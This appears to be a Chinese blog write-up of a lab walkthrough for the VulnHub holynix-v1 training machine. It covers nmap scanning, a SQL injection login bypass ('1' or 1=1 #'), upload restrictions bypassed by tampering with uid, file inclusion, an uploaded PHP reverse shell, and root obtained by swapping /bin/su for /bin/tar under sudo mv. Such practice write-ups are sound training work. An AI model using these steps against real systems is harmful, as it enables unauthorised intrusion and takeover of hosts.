vulnhub系列:holynix-v1靶机

holynix-v1

靶机下载

一、信息收集

nmap扫描存活

nmap扫描网段

nmap扫描端口等

nmap扫描端口

访问站点

首页

目录扫描

目录扫描

拼接查看

登录框

http://192.168.23.145/login.php

登录框

这里没什么发现,登录框也没测到sql

首页的login也有个登录框

首页login

单引号输入报错,username处被转义,password处未转义

sql报错

sqlmap跑一下,存在sql注入

首页login登录框sql注入

尝试万能密码登录

密码处输入

1' or 1=1 #

万能密码登录

发现文件上传功能

文件上传功能

无法上传文件,显示不允许alamo用户上传文件到家目录

上传文件失败

将数据包中的uid改为0显示未登录,改为2成功上传,但是这里不知道文件的路径

uid改为2成功上传

security中有一个显示文件功能,可能存在文件包含

疑似文件包含功能

显示时burp抓包查看,将提交数据处更换为系统文件,成功显示,存在文件包含

存在文件包含

文件上传后,url中的php文件尝试包含

文件上传后的php文件

发现文件被上传到home目录下

发现文件被上传到home目录下

访问文件没有回显,蚁剑也无法连接

二、getshell

kali中执行命令

locate php-reverse

cp /usr/share/laudanum/php/php-reverse-shell.php .

修改文件中反弹shell的IP和端口

修改shell文件

此前包含的transfer.php文件中给出了压缩包转换需要的格式

执行命令

tar czf shell.tar.gz php-reverse-shell.php 

将压缩的shell.tar.gz文件上传,查看上传的文件,点击访问

上传shell文件

成功反弹shell

成功反弹shell

三、提权

查看当前用户

01

用python切成交互式,提升交互性

python -c "import pty;pty.spawn('/bin/bash')"

02

查看当前权限

sudo -l

03

mv提权

sudo mv /bin/tar /bin/tar.orgi
sudo mv /bin/su /bin/tar
sudo tar

04

  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值